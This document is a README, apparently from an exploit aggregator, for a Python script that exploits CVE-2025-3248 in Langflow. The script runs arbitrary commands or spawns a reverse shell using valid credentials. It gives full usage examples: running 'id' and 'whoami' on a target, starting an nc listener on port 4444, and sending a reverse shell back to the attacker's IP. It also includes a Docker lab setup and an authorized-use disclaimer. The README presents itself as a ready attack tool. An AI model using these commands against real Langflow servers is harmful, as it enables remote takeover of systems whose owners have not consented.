## https://sploitus.com/exploit?id=D5C2C4F9-735B-50DB-A4A1-C34A555D8C5D
# Authenticated CVE-2025-3248 Langflow Remote Code Execution

This Python script exploits **CVE-2025-3248** to execute arbitrary commands or spawn a reverse shell on a vulnerable Langflow instance.
**Authentication is required**: the script needs valid credentials for the target.

---

## Features

- **Authenticated Command Execution:** Run arbitrary system commands on the target.
- **Reverse Shell:** Spawn a reverse shell to your listener.
- **Proxy Support:** Route requests through a proxy (e.g., Burp Suite).

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies with:

```bash
pip install requests
```

---

## Usage

```bash
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
```

### Arguments

| Argument           | Description                                  | Required |
|--------------------|----------------------------------------------|----------|
| `-u`, `--url`      | Target base URL (e.g., `https://target.com`) | Yes      |
| `-l`, `--login`    | Admin username                               | Yes      |
| `-p`, `--password` | Admin password                               | Yes      |
| `-c`, `--command`  | Command to execute on the target             | No*      |
| `--proxy`          | Proxy URL (e.g., `http://127.0.0.1:8080`)    | No       |
| `--lhost`          | Local host for reverse shell                 | No*      |
| `--lport`          | Local port for reverse shell                 | No*      |

\* You must specify either a command (`-c`) or both `--lhost` and `--lport` for a reverse shell.

---

### Examples

#### 1. Execute a Command

```bash
python3 exploit.py -u https://target.com -l admin -p password -c "id"
```

#### 2. Get a Reverse Shell

Start a listener on your machine:

```bash
nc -lvnp 4444
```

Then run:

```bash
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
```

#### 3. Use a Proxy

```bash
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
```

---

## Docker image

### Deploying the image

You can start a container from the Docker image with the following command:

```bash
podman compose up -d
```

The Langflow instance will be available at `http://localhost:7860`.

Credits for the compose file: [This repository](https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248)

---

## Disclaimer

This script is for **educational and authorized penetration testing** purposes only.
**Do not use against systems you do not own or have explicit permission to test.**

---

This readme is AI generated.